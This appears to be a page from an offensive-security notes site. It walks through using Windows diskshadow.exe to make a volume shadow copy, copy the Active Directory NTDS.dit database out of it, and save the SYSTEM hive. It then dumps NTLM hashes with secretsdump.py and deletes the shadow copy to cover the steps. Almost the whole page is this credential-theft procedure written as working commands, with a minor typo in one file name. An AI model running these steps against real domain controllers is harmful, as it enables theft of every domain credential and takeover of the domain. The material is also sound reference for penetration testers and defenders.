Diskshadow - No credential required

Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). By default, Diskshadow uses an interactive command interpreter similar to that of Diskraid or Diskpart. Diskshadow also includes a scriptable mode.

DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extractionbohops

This will

# Path 
# C:\Windows\System32\diskshadow.exe
# C:\Windows\SysWOW64\diskshadow.exe

CMD>diskshadow.exe

diskshadow>set context persistent nowriters 
diskshadow>set metadata c:\temp\metadata.cab
diskshadow>add volume c: alias someAlias
diskshadow>create
diskshadow> expose %someAlias% z:
diskshadow> exit

CMD> mkdir c:\temp
CMD> cmd.exe /c copy z:\windows\ntds\ntds.dit c:\temp\ntds.dit

CMD>diskshadow.exe

diskshadow>delete shadows volume someAlias
diskshadow>reset
diskshadow>exit

CMD> reg.exe save hklm\system c:\Temp\system.bak

Kali> secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Kali> secretsdump.py -ntds ntds.dit -system system.back -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

Previousntdsutil.exe - no credential required Nextvssadmin - no credential required

Last updated 9 months ago